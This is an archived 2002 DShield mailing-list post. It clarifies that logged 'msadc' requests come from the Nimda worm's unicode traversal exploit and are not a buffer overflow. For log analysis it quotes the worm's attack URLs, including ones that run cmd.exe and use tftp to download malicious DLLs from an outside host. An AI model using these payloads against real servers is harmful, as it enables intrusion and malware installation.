[Dshield] MDAC / MSADC clarification

Johannes Ullrich jullrich at euclidian.com
Fri Nov 22 02:12:59 GMT 2002


   before everyone is sending in more Nimda logs... The following URLs
mention 'msadc', but are used by the Nimda worm and use a unicode exploit,
not a buffer overflow.

   I should call this vulnerability now by its correct name 'MDAC
Vulnerability. (Microsoft Data Access Component) 


msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../Admin.d
ll
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../httpod
bc.dll
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/
system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/
system32/cmd.exe?/c+tftp%20-i%20[IPADDRESS]%20GET%20cool.dll%20c:\httpodbc
.dll
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/
system32/cmd.exe?/c+tftp%20-i%20[IPADDRESS]%20GET%20Admin.dll%20c:\Admin.d
ll

-- 
--------------------------------------------------------------------
jullrich at euclidian.com             Collaborative Intrusion Detection
                                         join http://www.dshield.org
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://www.dshield.org/pipermail/list/attachments/20021121/c5e1e6f3/attachment.bin


More information about the list mailing list